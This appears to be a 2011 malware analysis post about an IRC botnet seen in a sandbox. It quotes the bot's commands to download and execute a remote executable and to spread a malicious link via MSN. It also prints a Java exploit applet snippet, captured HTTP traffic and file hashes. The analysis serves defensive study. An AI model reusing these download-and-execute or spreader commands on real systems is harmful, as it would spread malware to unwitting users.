IRC Botnet Logs with MSN Spreader

We noticed the following details in a log file in our sandbox:

:m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr
:Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/
:Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177

These details are related to an IRC botnet and we can extract few commands:

1. Bots with country (-c) as FRA/ESP/ITA join channel “#it”:

.j -c FRA,ESP,ITA #it

2. Download and execute a remote file:

.dl http://efirst-data. in/install.48208.exe

3. Enable module MSN spreader:

.mod msn on

4. Initialize MSN spreader:

.msn.int

5. Set MSN spreader URL:

.msn.set http://image4msn. com/

Now the victim will send to all his MSN contacts the malicious URL:

http://image4msn. com/

This URL contains a java exploit, as we can see from here:

<body><applet code='mordor.saruman.class' archive='./games/plugins.jar'><param name='sko' value=[...]

Report 2011-03-28 14:19:39 (GMT 1)
File Name plugins-jar
File Size 9015 bytes
File Type Unknown file
MD5 Hash 7b0418be80084558cf34f6bdc2d5b112
SHA1 Hash 727d343bfd8f5bb970df10fed97eccb9562ac634
Detections: 0 / 9 (0 %)
Status CLEAN

This is an image of the malicious URL when visited:

Image

Unprotected folder reveals existence of other files (exploit kit):

Image

Network traffic:

GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
POST /objects/ocget.dll HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: activex.microsoft. com
 
GET /d.php?f=18&e=0 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com

An executable file (PE) is downloaded:

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 12:22:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Pragma: public
Expires: Mon, 28 Mar 2011 12:22:17 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 91280
Connection: close
Content-Type: application/x-msdownload

MZ